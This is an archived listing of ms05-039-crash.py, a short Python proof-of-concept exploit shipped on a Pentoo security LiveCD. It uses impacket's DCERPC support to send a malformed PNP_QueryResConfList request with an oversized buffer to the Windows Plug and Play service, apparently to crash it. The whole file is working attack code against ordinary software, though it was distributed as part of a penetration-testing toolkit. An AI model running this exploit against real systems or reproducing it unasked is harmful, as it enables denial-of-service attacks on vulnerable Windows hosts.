home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / bin / ms05-039-crash.py < prev    next >
Encoding:
Python Source  |  2006-05-22  |  732 b   |  31 lines
  1. import sys
  2. from exploit import DCERPCExploit
  3. from impacket.structure import Structure
  4.  
  5. class PNP_QueryResConfList(Structure):
  6.     alignment = 4
  7.     structure = (
  8.     ('treeRoot',    'w'),
  9.     ('resourceType','<L=0xffff'),
  10.     ('resourceLen1','<L-resource'),
  11.     ('resource',    ':'),
  12.     ('resourceLen2','<L-resource'),
  13.     ('unknown_1',   '<L=4'),
  14.     ('unknown_2',   '<L=0'),
  15.     ('unknown_3',   '<L=0'),
  16.     )
  17.  
  18. class UMPNPExploit(DCERPCExploit):
  19.     UUID = ('8d9f4e40-a03d-11ce-8f69-08003e30051b','1.0')
  20.  
  21.     def attackRun(self):
  22.     query = PNP_QueryResConfList()
  23.  
  24.     query['treeRoot'] = "ROOT\\ROOT\\ROOT\x00".encode('utf_16_le')
  25.     query['resource'] = '\x00'*8+'\x00\x01\x00\x00'+'A'*256
  26.  
  27.     self.dce.call(0x36, query)
  28.  
  29. e = UMPNPExploit(sys.argv[2:])
  30. e.run()
  31.